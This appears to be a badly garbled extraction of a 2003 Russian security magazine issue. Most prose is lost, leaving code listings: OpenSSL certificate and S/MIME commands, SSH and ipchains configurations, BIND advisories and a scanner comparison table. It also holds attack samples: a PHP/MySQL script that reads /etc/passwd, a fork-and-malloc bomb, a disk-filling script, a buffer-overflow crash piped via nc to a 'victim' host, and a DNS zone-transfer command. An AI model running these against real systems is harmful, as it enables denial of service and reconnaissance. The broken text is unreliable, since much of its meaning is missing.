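# client key; tmp.key is unencrypted and exists only inside $TMP
$GENRSA -rand "$RAND" -out tmp.key "$BITS"

# request configuration; the numbered strings are the interactive prompts.
# NOTE(review): "extensions = v3_req" is kept from the listing; openssl req
# only adds request extensions from "req_extensions", so the v3_req section
# is applied at signing time below via -extfile/-extensions.
cat > cfg <<EOT
[ req ]
default_bits = $BITS
distinguished_name = req_DN
extensions = v3_req
[ req_DN ]
countryName = "1. Country Name (2 letter code)"
countryName_default = "$C"
countryName_min = 2
countryName_max = 2
stateOrProvinceName = "2. State or Province Name (full name)"
stateOrProvinceName_default = "$ST"
localityName = "3. Locality Name (eg, city)"
localityName_default = "$L"
0.organizationName = "4. Organization Name (eg, company)"
0.organizationName_default = "$O"
organizationalUnitName = "5. Organizational Unit Name (eg, section)"
organizationalUnitName_default = "$OU"
commonName = "6. Common Name (eg, CA name)"
commonName_max = 64
commonName_default = "$CN"
emailAddress = "7. Email Address (eg, name@FQDN)"
emailAddress_max = 40
emailAddress_default = ""
[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = $PURPOSES
nsCertType = $CERTTYPE
EOT

# certificate request
$REQ -new -key tmp.key -config cfg -rand "$RAND" -out "$CN.pem"
rc=$?
# the listing checked $? after "rm -fr /tmp/.rnd" (the status of rm) and
# then printed and exited with the status of the test itself (always 0)
if [ $rc -ne 0 ]; then
    echo "Failed to make a certificate due to error: $rc"
    popd > /dev/null
    rm -fr "$TMP"
    exit $rc
fi

# sign with the CA: -extensions names the section in cfg, -CAcreateserial
# creates the CA serial file on first use and reuses it afterwards
$X509 -req -in "$CN.pem" -CA "$CA" -CAkey "$CAkey" \
    -extfile cfg -extensions v3_req -CAcreateserial -days "$DAYS" -out "$OUTDIR$CN.pem"
chmod 0400 "$OUTDIR$CN.pem"
chown root:root "$OUTDIR$CN.pem"

# the client receives a 3DES-encrypted, passphrase-protected copy of the key
$RSA -in tmp.key -des3 -out "$OUTDIR$CN-key.pem"
chmod 0400 "$OUTDIR$CN-key.pem"
chown root:root "$OUTDIR$CN-key.pem"

# remove the scratch directory together with the unencrypted key and seed
popd > /dev/null
rm -fr "$TMP"
echo -e "Generation complete, go to $OUTDIR and give to client $CN his certificate and \n private key(for windows users you should use openssl pkcs12 utility)"

# Example from the article (not part of the script): bundle a client
# certificate and key into PKCS#12 for Windows clients:
#   openssl pkcs12 -export -in client.pem -inkey client-key.pem -out client.p12 \
#       -name "Client certificate from our organization"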

1(2), 2003

, (v3_req), ,
,
CA-. CA- basicConstraits
CA:TRUE ( !). nsCertType
(
, , ).
CA-

nsCertType: sslCA, emailCA. ssl


(, )
nsCertType =
server.

(
).
,
(!)
.
Microsoft

PKCS#12.
openssl pkcs12:

:
openssl pkcs12 -in client.p12 -out
client.pem


, CA-,
( -des3, -idea . .).
pem
( !).


pkcs12 (
inkey), base64 .cer (openssl x509 -in
CA.pem -outform DER -out CA.cer).
openssl
s/mime , openssl smime.

25


,
,
MIME- .
:

smime :

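# Sign mail.txt as S/MIME (-text adds the text/plain MIME header) with
# mycert.pem and its key, then hand the message to sendmail.  -from/-to/
# -subject only write the message headers; the delivery address is the
# argument to sendmail.  Re-joined from the wrapped listing.
openssl smime -sign -in mail.txt -text -from CEBKA@smtp.ru -to user@mail.ru \
    -subject "Signed message" -signer mycert.pem -inkey private_key.pem \
    | sendmail user@mail.ru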

PEM PKCS#7, DER


base64. , -in
(),
-content

-in ( ) (-sign)
(-signer)
(-inkey).
sendmail, MIME- from,
to subject.
openssl smime -verify -in mail.msg
-signer user.pem -out signedtext.txt

-in,
-out,

-signer ( s/mime ,
, s/mime !).
openssl smime -encrypt -in mail.txt
-from CEBKA@smtp.ru -to user@mail.ru \
-subject "Encrypted message"
-des3 user.pem | sendmail
\
user@mail.ru

-in
user.pem, des3.
sendmail.
openssl smime -decrypt -in mail.msg
-recip mycert.pem -inkey private_key.pem
\ -out mail.txt

-in -inkey -recip (


).

smime- from, to subject.

-out sendmail .
, smime:
PKCS#7
( base64).

26

openssl smime -verify -inform [PEM |


DER] -in signature.pem[der] -content \
mail.txt

.
smime , -pk7out (PEM-). PKCS#7
PEM DER
openssl
base64 (

-d).
, ,
SSL .

bugtraq

BIND
ISS X-Force Berkeley Internet Name Domain Server (BIND).
BIND DNS-.
, , DNS- . ,
.
.

BIND SIG Cached RR Overflow Vulnerability


,
DNS-, SIG resource records (RR) ( ), .

, .
, n
DNS-, IP-
. DNS- DNS-, .
n .
DNS- , ,
DNS-.
DNS- BIND 4 BIND 8
: n-request-sent/65535, n-request-sent
, DNS-.
, DNS ( SMTP,
HTTP, LDAP, FTP, SSH).
BIND 4.9.11, 8.2.7, 8.3.4.

BIND OPT DoS


, DNS- , BIND 8, OPT- UDP-.

BIND SIG Expiry Time DoS


, DNS-, BIND-, SIG RR
.
BIND 8 8.3.3,
BIND 4 4.9.10.

DNS BIND
CAIS/RNP (Brazilian Research Network CSIRT) Vagner
Sacramento DIMAp/UFRN ( Rio Grande do
Norte)
Internet Software Consortiums (ISC), Berkeley Internet Name
Domain (BIND),
DNS (DNS Spoofing) 4 8 .
60% DNS- BIND. , BIND
2-
, DNS- .
, DNS-,
IP- .
, . n DNS DNS- (BIND 4 BIND 8), ,
DNS-, -

1(2), 2003


PHP + mySQL ( )
PHP mySQL,
. (mySQL) .
PHP- (viewfile.php):
<?
// Bugtraq demonstration (viewfile.php): reads a local file through MySQL's
// LOAD DATA LOCAL INFILE instead of PHP's file functions.  With LOCAL the
// *client* library - here the web-server process - reads the file and ships
// it into a temporary table, so the read runs with the web server's
// privileges; presumably the point of the note is that PHP-level file
// restrictions do not cover that path (the surrounding text is not legible
// here - verify).
// Mitigation: run mysqld with local-infile=0 so LOAD DATA LOCAL is refused,
// and keep web-facing database accounts without CREATE TEMPORARY TABLE.
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd";
// filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser, $dbpasswd);
// the file is loaded as a single LONGBLOB row: the field and line
// terminators are chosen so they never occur in the input
$sql = array ("USE $dbname",
'CREATE TEMPORARY TABLE '.
($tbl = 'A'.time()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE
$tbl FIELDS ". "TERMINATED BY
'__THIS_NEVER_HAPPENS__' ". "ESCAPED BY'' ".
"LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1");
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die
("FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n");
// only the final SELECT yields a row; the others continue
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "
"; ?>

/etc/passwd.
, .

.

27

...

,
. rsh,
(
) . , telnet-. rsh: , , , ; ,
; ip ,
, . rsh , ,
(
). - ssh.


s (secure), , ssh, ,
, . ssh, . ssh 2.

( ). ssh
(

28


,

backdoors), ssh
OpenSSH, www.openssh.com.
ssh , -, man ssh,
.
, , , . SSH 3
: ip- (),

.
ssh 2:
,

( Preferred
Authentications sshd.conf),
.

,
, , ,
(

).


, ,
(.
OpenSSL),
.
, ssh, ( aes 128 ).
, ssh 1
,
, , . 2
,

sha md5, (
ssh 1).
ssh.



:
RSA,
. .
$HOME/.rhosts,
$HOME/.shosts, /etc/hosts.equiv
/etc/ssh/shosts.equiv,
( , ..
ip- ),
/etc/
ssh/ssh_known_hosts $HOME/.ssh/
known_hosts. , ,

, ,
,
, /etc,
. :
! .rhosts ,
( );
! .shosts .rhosts,

ssh,

1(2), 2003

.
.shhosts:
user1.test.ru user1 userstend.test.ru
user1 null.test.ru user1

! /etc/hosts.equiv

/ ,
;
/etc/shosts.equiv hosts.
equiv, ssh,
. :
/etc/shhosts.equiv + user1.test.ru
user1 server.test.ru xakep

+

, -
.
* /etc/ssh/ssh_known_hosts $HOME/
.ssh/known_hosts

.

. ,
,
(
) . ,
. , ,
. ,


ssh_known_hosts.
3- : ( , ),
(!) (). known_hosts:
user1.test.ru
{SOME_VERY_LONG_PUBLIC_KEY}

(name.domain),
. ,
* ?. -

ssh (identity.pub)
.

ssh_known_hosts
(aka root).
:
ssh_known_hosts, .. ,

.
,
.




(
) , , . , , , .
,
,
(,
openssh).
ssh-keygen.
sshkeygen -t {RSA DSA}, , sshkeygen -t rsa RSA
1024 . , , -f (
$HOME/.ssh/id_rsa $HOME/.ssh/
id_dsa rsa dsa ),
:
-b: ssh-keygen -t rsa -b 2048 -f
$HOME/.ssh/id_rsa


, , ( 10- ).
( ,

29


ssh-agent).
ssh-keygen
: ( ), .pub
(id_rsa.pub). $HOME/
.ssh/authorized_keys.
. authorized_keys
,
:
.
,
, , ,
,
. , .
,
.

ssh-copy-id. :
# ssh-copy-id
user@machine

-i public_key_file


machine user ( ,
)
( )
, public_key_file ( $HOME/
.ssh/identity.pub,
) $HOME/.ssh/
authorized_keys.
, .
,
,
(, ).

:

,
-

30

. ,
, , ssh
, ,
ssh . , , 1 . , ...
,
, .
:
, , (
).
ssh ssh_config sshd.conf .
$HOME/.ssh/config /etc/
ssh/ssh_config ( ).
: . * ?,

, ( ).
ssh_config, (

ssh
, ..
):
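# Client settings for hosts in test.ru ("*" and "?" wildcards are allowed in
# Host patterns).  Everything below applies to hosts matching the pattern.
# The garbled comment lines of the listing have been rewritten; the default
# noted after each option is the one the page gives.
Host *.test.ru
# forward X11 over the ssh connection (default no)
ForwardX11 yes
# protocol 2 only: order in which authentication methods are tried
PreferredAuthentications hostbased,publickey,keyboard-interactive
# allow password authentication (default yes)
PasswordAuthentication yes
# how many times to ask for the password before giving up
NumberOfPasswordPrompts 3
# NOTE(review): the listing places these three server-side directives here.
# AllowUsers/AllowGroups/DenyUsers/DenyGroups are sshd_config options
# (USER@HOST patterns, "*" and "?" allowed); the ssh client rejects them as
# "Bad configuration option", so they are kept only as a record of the
# intended policy and belong in sshd_config:
#   AllowUsers *@*.test.ru
#   DenyUsers xakep lamer
#   DenyGroups x*
# protocol 2 host-based authentication, the counterpart of rhosts-RSA
# (default no)
HostbasedAuthentication yes
# never fall back to rsh when ssh fails (default no)
FallBackToRsh no
# never use rsh at all (default no)
UseRsh no
# batch mode disables password/passphrase prompts (default no)
BatchMode no
# also check the host's IP address against known_hosts, not only its name
# (default yes)
CheckHostIP yes
# yes: refuse hosts not in known_hosts; ask: prompt before adding a new host
# key and refuse a changed one; no: accept silently (default ask)
StrictHostKeyChecking ask
# identity files for protocol 2 rsa and dsa keys.  The listing wrote
# $HOME/.ssh/id_rsa; ssh does not expand shell variables here, only "~"
IdentityFile ~/.ssh/id_rsa
IdentityFile ~/.ssh/id_dsa
# port to connect to (default 22)
Port 22
# protocol 2 only
Protocol 2
# protocol 1 cipher
Cipher 3des
# protocol 2 ciphers in order of preference (the listing reads "blowfishcbc"
# and "aes192cbc"; the hyphens are part of the cipher names)
Ciphers aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc
# escape character for the session ("~." etc.); none disables it (default ~)
EscapeChar ~
# compress the connection (default no)
Compression yes
# send keep-alive messages to detect a dead peer (default yes)
KeepAlive yes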

,

:
, ssh 1

( )
.
. sshd
/etc/ssh/sshd_config,
ssh_config, ,
ssh_config.
sshd_config, :
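# sshd_config example from the article.  The listing prints "Port 22
# Protocol 2" on one line; sshd takes one directive per line.  Garbled
# comment lines have been rewritten.
Port 22
Protocol 2
# address to listen on; a port may be appended as host:port
# (server.test.ru:2022)
ListenAddress server.test.ru
# host key for protocol 1
HostKey /etc/ssh/ssh_host_key
# rsa and dsa host keys for protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
# protocol 1 ephemeral server key: regeneration interval (seconds) and size
KeyRegenerationInterval 3600
ServerKeyBits 768
# seconds a client may take to authenticate before being dropped
LoginGraceTime 600
# root login over ssh.  The listing allows it; the article's own checklist
# further down recommends "without-password" (key-only root) or "no" with
# sudo, and limiting the source addresses with iptables.
PermitRootLogin yes
# refuse key files and directories with unsafe ownership/permissions
# (e.g. a world-writable home directory)
StrictModes yes
# RSA key authentication (protocol 1)
RSAAuthentication yes
# public-key authentication (protocol 2)
PubkeyAuthentication yes
# file with the user's authorized public keys (%u = user name, %h = home);
# the value was split over three lines in the listing
AuthorizedKeysFile .ssh/authorized_keys
# plain rhosts authentication: trust by host name/address alone
RhostsAuthentication no
# ignore per-user .rhosts/.shosts for rhosts and host-based authentication;
# only the system-wide files and known_hosts remain
IgnoreRhosts yes
# rhosts plus RSA host-key authentication (protocol 1)
RhostsRSAAuthentication no
# host-based authentication (protocol 2)
HostbasedAuthentication yes
# yes would ignore the user's ~/.ssh/known_hosts during host-based
# authentication (default no)
IgnoreUserKnownHosts no
# password authentication; the text suggests "no" once keys are in place
PasswordAuthentication yes
# never accept accounts with an empty password
PermitEmptyPasswords no
# PAM authentication via keyboard-interactive
PAMAuthenticationViaKbdInt no
# X11 forwarding over ssh
X11Forwarding yes
# bind the forwarded X display to loopback only
X11UseLocalhost yes
# print /etc/motd at login
PrintMotd yes
# print the time of the previous login
PrintLastLog yes
# send keep-alive messages
KeepAlive yes
# maximum number of concurrent unauthenticated connections
MaxStartups 10
# banner shown before authentication
Banner /etc/ssh_message
# reverse-DNS check of the client address
VerifyReverseMapping no
# sftp subsystem (split over three lines in the listing); sftp replaces ftp
# with a transfer that is encrypted by ssh
Subsystem sftp /usr/lib/ssh/sftp-server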

, !
, ssh.
. SSH ,
, , ,
.
, .
, ,
,

31


(
).
ssh
:

IgnoreHosts
RhostsAuthentication
RhostsRSAAuthentication
RSAAuthentication
HostbasedAutentification
PasswordAuthentication
PermitEmptyPasswords
UseLogin

yes
no
no
yes
no
no
no
no

PermitRootLogin without-password
- L{LOCAL_PORT}:{LOCAL_ADDRESS}:
{REMOTE_PORT}:
# ssh -L10101:localhost:101
server.test.ru


, ..
. ,
sleep :
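# Forward local port 10101 to port 101 on the remote host's loopback, go to
# the background (-f) and keep the session alive only while "sleep 100" runs.
# The listing reads "loclahost"; the host part is "localhost".
ssh -f -L10101:localhost:101 server.test.ru sleep 100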


100 , . :
,
,
ftp smtp
pop3 (, sftp- openssh,

sftp [user@]hostname, ..

ssh sftp
ssh).

,
sshd AllowTcpForwarding no. ssh
, ..
( ssh 2
).
ssh. rsa
4096 :
# ssh-keygen -t rsa -b 4096


ssh-copy-id
():
# ssh-copy-id -i $HOME/.ssh/id_rsa
remote_host

hostbased sshd_config:

32

1 (
Protocol 2,1 ssh 1, ssh 2):
Protocol 2

, ssh (
!) . ,
?

(, bash)
ssh .
sshagent ( ssh).
(ssh-agent ).
sshadd, $HOME/.ssh/id_rsa, id_dsa, identity.

, ssh-add
: ssh-add filename. ,
ssh-add , (
), :
ssh-agent. sshagent
, (
), .. .
ssh-agent:
# ssh-agent bash # ssh-add Enter
passphrase for .ssh/id_rsa: Enter
passphrase for .ssh/id_dsa: .ssh/
identity : No such file or directory

ssh-agent ,
.
,

. AllowUsers sshd_config

iptables. ,
ssh.
ssh
(PermitRootLogin no)
sudo.
2 ( ,

,
, 2 ssh
). ssh,
:
Windows:
! putty:
http://www.chiark.greenend.org.uk/
~sgtatham/putty.html
! raju:
ftp://ftp.franken.de/pub/win32/
develop/gnuwin32/cygwin32/
porters/mathur_raju
! cigaly:
http://www.doc.ic.ac.uk/~ci2/ssh/
! f-secure:
http://www.datafellows.com/f-secure/
fclintp.htm
! secure crt: http://www.vandyke.com/
products/securecrt/
! ttssh:
http://www.zip.com.au/
~roca/ttssh.html
! therapy:
http://guardian.htu.tuwien.ac.at/
therapy/ssh/
! chaffee:
http://bmrc.berkeley.edu/
people/chaffee/winntutil.html
! sergey okhapkin:
http://www.lexa.ru/sos/
! fissh:
http://www.massconfusion.com/ssh/
Mac:

! niftytelnet+ssh:
http://www.lysator.liu.se/
~jonasw/freeware.html
! f-secure:
http://www.datafellows.com/f-secure/
fclintp.htm
ssh www.heimhardt.com,
www.openssh.com, ssh ( 1) www.opennet.ru.




.


. :



- .
.

Local D.o.S. attack


D.o.S.- (Denial of Access ) ,
.
, . / .
D.o.S. ( ) (
*nix ):

{
/* Body of LocalDoS.c (its "#include" and "main ()" lines appear later in the
 * extracted text): allocate and fork without limit until the machine runs
 * out of processes or memory.  Defence, as the page discusses: per-user
 * resource limits - RLIMIT_NPROC / RLIMIT_AS, i.e. "ulimit -u" and
 * "ulimit -v" set through /etc/security/limits.conf on PAM systems - stop
 * a single account from exhausting the host. */
while(1) /* loop forever */
{
malloc(10000);
/* man: calloc, malloc, free,
realloc - allocate and free dynamic
memory */
fork();
/* man: fork - create a child
process (the child loops as well) */
}
}


,
- ,

(Ctrl+Alt+Del),
Reset,
.

. ,
syslogd (
Windows NT-based)
(
)
shell:
Echo.c :

LocalDoS.c:
#include <stdio.h>
main ()

34

#include <stdio.h>
/* Echo.c: prints 'X' forever.  The page redirects its output into a file
 * under /tmp (disk_DoS.sh) to fill a filesystem.  Defence, as the page
 * suggests: keep /tmp, /var and /home on filesystems of their own so a
 * full one does not take the system down, and watch for hidden
 * (dot-prefixed) files with "ls -a" when space vanishes. */
void main()
{
while (1)

printf (X); /* NOTE(review): X is unquoted in the listing, so this does not
               compile as printed; the page's comment says it prints "X" */


}
disk_DoS.sh :
#!/bin/sh
./echo > /tmp/.



. ( ),
, ls
( -a).
, ( )
. , :
/,

, ,
. ,
vi , .
,

( /tmp, /var, /home),


,

mount, , siud-

?

. cron , , shell-, ,
/root.
, (
)
,
. find,
xargs gzip.

Remote D.o.S. attack


D.o.S.- .
,
- ,
. /,
.
,
.

, , .

TCP/IP. .

(client) (victim). , ,
- /, ,

1(2), 2003

,
- .
,
:

TCP-,
SYN
ACK.
. ,
( )
ACK SYN-
. ,
, . ;
.
.

SYN- .
/
- .
.


, ,
, ,
.

, -
.
, .

,

.
.
victim :

-

,
, ,
( ,
, client
victim).
,
- ,
.
, ,

. ,
. , ,
.
TCP-. .
, ,
,

.
, ,
,
, .
D.o.S.-

.
:
.


. (buffer overflow). ,
.
, -

35


, , 2101,
- ,
, , root@localhost
(
). ,
: , , 32 768
. , - ,
, .
32 768
- . , . , ,
.

. ,
,
, . , , . ,
,
.

,
, ,
, ,
, 32 770 . , ,
char_echo,
nc (net cat):
Char_echo.II.c :
#include <stdio.h>
main ()
{
int i; /* */
for (i=0; i<=33000; i++) /*
33000 ""*/
printf ("X"); /* 'X'*/
}
go.sh :
#!/bin/sh
./echo_char | nc victim 2101

, , . , . , , /


- .

;
.
,
, -
kernel
panic ( *nix ),
The blue screen of death ( Windows-). , , ,
, .

- . .
WinNuke.
, , ,
Windows.

Linux
OpenBSD.
, .

, - .
.
, . ,
, ,
.
. : ,
, . ,

-,
, , , --

.
-,
.
, (,
), , - , , , (, tcpspy,
icmplog,). , .
: . ,
SYN flood, , , .

(, , ,
,

-
, ), , ,
. ,
.
,
, , ,
,
. IP-
,
.
, .


,

/ .
,
D.o.S.-,


,
, -


.
, ,

.

Local root attack


, ,
root
Administrator ,

,


( ). .
, , ,
. ,
.
,

, ,
.
SUID-,

,
. .
, ,
, ,
,

. , .

.
,
. : ,
/tmp/NameOfFile.some_addition. -


,
,
,
, , .
SUID-
/tmp/
NameOfFile.PID, PID , , .
, , , . /tmp
, ,
, , . , , . , , /etc/passwd /tmp/
NameOfFile.Guesed_PID. root::0:0:root:/root:/bin/sh. , ,
/etc/passwd?
,
. , ,
,
- ( /etc/passwd
).
.

Remote root attack


root . (,
,
) D.o.S.-,
, ,

. , ,
. ,
, (shell),
, .
(

), .
.

IP-, . ;
,
. , - , .
(grab ) (,

) (
).
, - (log file),
.

, . ,

- (
-
),
. , root shell, , ,
. ,
,
,
.


(

Linux)
Linux,
, ,
, .



( )
, ,
,
.
,
,

. .


Linux , ,
, ,
. . ,
, . ( )
(, ,
, www.securityfocus.com
) .
,
,

.
( )
,


,

(http://www.openwall.com/).
, .
(http://
www.lids.org),
,
nmap.


, : , , .

37 (time), 69 (tftp), 79 (finger),


111 (sunrpc), 512 (TCP exec; UDP
biff), 513 (TCP login; UDP who), 514
(TCP cmd; UDP syslog), 517 (talk),
525 (timeserver).
, : HTTP/HTTPS, FTP, Telnet/SSH,
SMTP, POP3/IMAP -. .

HTTP/HTTPS

, ,


(,
7- , echo).
.
, , ( )
( , ,
, ,
root).
:
-, (
www.securityfocus.com , ,
); -,

( ,
); -, ,
,
,
.
, , . , ,
,
,
( )
. - , . -

:
*nix Web-server Apache.
, , , (

).
(
/ Apache

).

FTP
: ,

WU-FTP, , , , , .
,
,
ProFTP, BSD
FTPD. ,
FTP- ,

http://www.security.nnov.ru/
articles/sacerdote.asp.

Telnet/SSH

. : (, remote root access
telnet), .
telnet- -


,
(sniffing),
,
.
, , telnet- , ssh.
SSH
telnet, , ,
, : , (
dial-up ),

.

SMTP

( ,
), ,

sendmail.
, ,

. ( ) , qmail (http://cr.yp.to/),

(
) .

POP3/IMAP
,
SMTP-,
qmail, POP3.

Proxy-
, ,
,
Squid, Oops
Apache. - , -


Squid Oops.
Squid-, ,
,
,

Oops.
( , , ),
Squid
.

,
,
TCP/IP, ,
( ipchains, 2.2.x).

, ,
,


.

,
; , :
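# Default policies for the three built-in chains: refuse everything that
# no later rule explicitly accepts. "-P" sets a chain's policy; the
# original listing had "-O" on the output line, which ipchains does not
# know, so that policy would never have been applied.
ipchains -P input DENY
ipchains -P output REJECT
ipchains -P forward REJECT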

lo0 ( )

(, , , ),
ICMP. , , , , ,
,
.



,
( HTTP, ,
DNS,
):
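# HTTP through an ipchains (2.2.x kernel) packet filter. The variables
# $EXTERNAL_INTERFACE, $IPADDR, $ANYWHERE and $UNPRIVPORTS are described
# in the text after the listing. Each command was split across several
# lines by the page layout; one rule per command here.

#client
# Requests from an unprivileged local port to any web server.
ipchains -A output -i $EXTERNAL_INTERFACE -p tcp \
    -s $IPADDR $UNPRIVPORTS -d $ANYWHERE 80 -j ACCEPT
# Replies from the web server. "! -y" excludes connection-opening
# (SYN-only) packets, so this rule cannot be used to open a new
# connection towards us.
ipchains -A input -i $EXTERNAL_INTERFACE -p tcp ! -y \
    -s $ANYWHERE 80 -d $IPADDR $UNPRIVPORTS -j ACCEPT

#server
# Requests from anywhere to our port 80.
ipchains -A input -i $EXTERNAL_INTERFACE -p tcp \
    -s $ANYWHERE $UNPRIVPORTS -d $IPADDR 80 -j ACCEPT
# Our replies; again no SYN-only packets may leave through this rule.
ipchains -A output -i $EXTERNAL_INTERFACE -p tcp ! -y \
    -s $IPADDR 80 -d $ANYWHERE $UNPRIVPORTS -j ACCEPT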
$EXTERNAL_INTERFACE
, ,
$IPADDR ,
$ANYWHERE ,
$UNPRIVPORTS ( 1024 65535).

, : -,

; -,
, ,
,
, ,

, . , , (,
).
,
(
).




-

,

.
: , . . , , , , ,
. , .


: () . ,
. .
! ,
?
! , , ?
! , ,
?
, , , , . , , , . ,
:



?
,

. ,
. , ,
.
. :
.
, , , (
, ,
. .). , .
.
-
, , (, ), ( ). ,
,
.
. , ,
, . -,
.
, , , . ,
.
,
. .

: , . , , .
, , . , , ,
.


ISS Internet Scanner

Internet Security Systems, USA
http://www.iss.net

0E



GFI, USA

0E

 
 

0E



0E

0E

LanGuard

http://www.languard.com
Shadow Security Scanner

Safety-Lab
http://www.safety-lab.com

X-Scan

Xfocus, China
http://www.xfocus.org

XSpider

Positive Technologies
http://www.ptsecurity.ru

, (, , Retina eEye Digital Security NetRecon


Symantec), , , . ,
. ,
, ( ,

). .
, , . , ,
.

, ,
, ,
:
! Solaris 2.6.1
! Windows 2000 Server
! Windows XP Professional
! Linux RedHat 5.2
! Compaq/Tandem Himalaya K2006 (OS D35)
! Bay Networks Router
! AS/400
(
):
! ISS Internet Scanner 6.2.1
! LanGuard 2.0
! ShadowSecurityScanner 5.31
! XFocus X-Scan v1.3 GUI
! XSpider 6.01

,
, , ,
.
1, , . ,






Solaris 2.6.1

tcp echo
udp echo
tcp discard
tcp daytime
udp daytime
tcp chargen
udp chargen
tcp ftp
tcp ftp
tcp telnet
tcp smtp
tcp smtp
tcp time
udp dns
udp dns
tcp snmptrap
udp snmp
udp snmp
udp snmp Interface
udp snmp Routes
tcp exec
tcp login
tcp shell
tcp printer
tcp printer
tcp uucp
tcp nfsd
tcp nfsd
tcp X
tcp httpd
Jigsaw a
tcp httpd
MiniServ
tcp status
tcp rusersd
tcp ttdbserverd
root
tcp kcms_server
tcp mountd

tcp bootparam
tcp RPC
Icmp timestamp

tcp status root
Finger
tcp chargen DOS


ISS

XS

LG

SSS

XF


;
;
;
;
;
;
;
;
;
;
;

;


;
;
;
;
;
;
;
;
;

;
;

;



;
;
;
;
;
;
;
;

;
;
;
;
;
;
;




;
;
;
;
;
;
;
;
;
;





;



;

;
;









;
;
;
;

;
;





;

;
;

;
;
;
;
;
;
;
;


;
;



;
;
;
;

;
;

;



;

;
;

;

;
;
;
;

;


















;

;





;
;
;
















;
;












;

;
;


















;




;




;






Windows 2000 Server

tcp ftp
tcp ftp
tcp ftp
tcp ftp
tcp ftp
tcp ftp
tcp httpd
MS IIS
tcp httpd
tcp Rpc
udp isakmp
tcp sqlserver.exe
tcp MsSQL
tcp MsRDP
Icmp timestamp

tcp MsSQL

Windows XP Professional

tcp echo
udp echo
tcp discard
udp discard
tcp daytime
udp daytime
tcp qotd
udp qotd
tcp chargen
udp chargen
tcp Rpc
tcp NetBios
tcp NetBios
tcp MSDs
udp isakmp
udp router
tcp Rpc
IcqClient
udp upnp
udp ntp
tcp httpd
Icmp timestamp

tcp chargen DOS


ISS

XS

LG

SSS

XF


;

;
;
;

;


;
;
;

;
;
;


;

;



;


;

;
;

;
;


;

;
;


;


;
;



;

;
;

;
;
;



;


;
;



;


;
;



;


;
;


;

ISS

XS

LG

SSS

XF


;
;
;
;
;
;
;
;
;
;
;
;

;
;
;
;
;

;

;


;
;
;

;
;
;
;
;
;
;
;

;


;

;
;
;







;





;
;
;
;










;

;

;

;

;

;
;

;


;



;



;

;

;

;

;

;
;

;









;

;



G. AS/400

ISS

XS

LG

SSS

XF


;
;
;
;
;


;





;
;


;

;
;
;

;
;
;
;
;
;
;




;

;
;
;


;










;
;
;
;
;

;

;

;





;
;
;
;
;


;








ISS

XS

LG

SSS

XF


;
;
;
;
;
;


;
;

;

;


;
;

;

;
;
;
;


;

;


;


;

;





;
;



;
;

;

;

;
;
;
;
;

;


;

;
;

;


;

;





tcp ftp
tcp ftp
tcp telnet
tcp smtp
tcp httpd IBM HTTP SERVER
tcp httpd IBM HTTP SERVER
tcp httpd
tcp netbios
tcp as-servermap
tcp httpd IBM HTTP SERVER
tcp httpd
tcp httpd Java Web Server
tcp httpd
udp isakmp
Icmp timestamp

D. Linux RedHat 5.2

tcp ftp
tcp ftp
tcp ftp
tcp telnet
tcp telnet
tcp smtp
tcp smtp
tcp smtp
tcp dns
tcp dns bind
tcp httpd
tcp NetBios
tcp NetBios
tcp login
udp rwhod
tcp shell
tcp printer
tcp nfsd
tcp httpd ConferenceRoom IRC
tcp httpd Apache (Unix) (Red-Hat/Linux)
tcp httpd
tcp httpd ConferenceRoom IRC
Icmp timestamp

udp rwhod
tcp printer

E. Compaq/Tandem Himalaya K2006 (OS D35)

tcp echo
tcp ftp
tcp telnet
tcp telnet
tcp finger
Icmp netmask
Icmp timestamp


;

;
;
;
;
;


;

;


;

;
;
;
;
;
;
;



;













;

;
;

;
;
;
;







;

;







ISS

XS

LG

SSS

XF


;
;
;
;
;
;
;


;
;
;

;





;
;

;




;
;
;

;




;
;
;

;




F. Bay Networks Router

udp echo
tcp ftp
tcp telnet

udp discard
tcp ftp
udp tftp
udp ntp
udp snmp
udp routed
Land DOS

, ,
, .
, .
:
! : +3
! : +2
! : +1
! : -3
! : -2
! : -1
2.
, .


X-Scan
SSS
LanGuard
XSpider
ISS


















ISS

XSpider

LanGuard

SSS

X-Scan

AS/400
Solaris
Compaq/Tandem
Himalaya
Windows 2000
Server
Windows XP
Professional
Linux RedHat
Bay Networks
Router






  


  


  
















  







  





  



  

  







  




















ISS

XS

LG

SSS

XF


;
;
;


;
;
;



;
;



;
;



;
;

;
;
;
;
;
;
;


































ISS Internet Scanner
, .
LanGuard . NetBios,
, . , . LanGuard .
ShadowSecurityScanner ISS.
.
, Retina.
. : ,
. X-Scan
,
LanGuard, . :
,
- .
XSpider , , Windows Solaris. XSpider
:
, , . , , Positive Technologies, , , , . , , , , .


, SecurityLab.RU, (. http://www.securitylab.ru/



_Services/Vote.asp?Archive=109&Poll_ID=4 ). .
:

"
Xspider
Shadow Security Scanner
Nessus Security Scanner
Retina
Internet Scanner (ISS)
CyberCop Scanner
Typhon II
NSAT
N-Stealth
HackShild












, . ISS (, )
ShadowSecurityScaner.
XSpider, , .
.

, .
, ,
. .




25 2002 Positive Technologies
(www.ptsecurity.ru)
SecurityLab.ru.
Positive Technologies
- -
.

SecurityLab.ru , - .
,
.
, Positive Technologies,
() ,

SecurityLab.ru.
Positive Technologies ,
. , . ,
. ,

. ,
SecurityLab.ru .

, ,
Positive Technologies .

: http://www.securitylab.ru
Positive Technologies: http://www.ptsecurity.ru
E-Mail: info@ptsecurity.ru


- 11 , 2001 .

IGUS



DNS

( security teams)
100 % 63%
DNS,
, .
,
.
[main.target.com]
$ORIGIN
target.com.
@
1D
IN

c4
admin
localhost
mail
proxy
www
c1
c2
c3
ns
ftp
@

100 ,
, 57
.
, , (transfer) ( DNS), , , ,

( , ip-, , , . .).
: , ,
www.target.ru; , DNS
nslookup, . :
fenix# nslookup
Nameserver 192.145.45.1
>server www.target.com
>ls -d target.com

- :


1D
1D
1D
1D
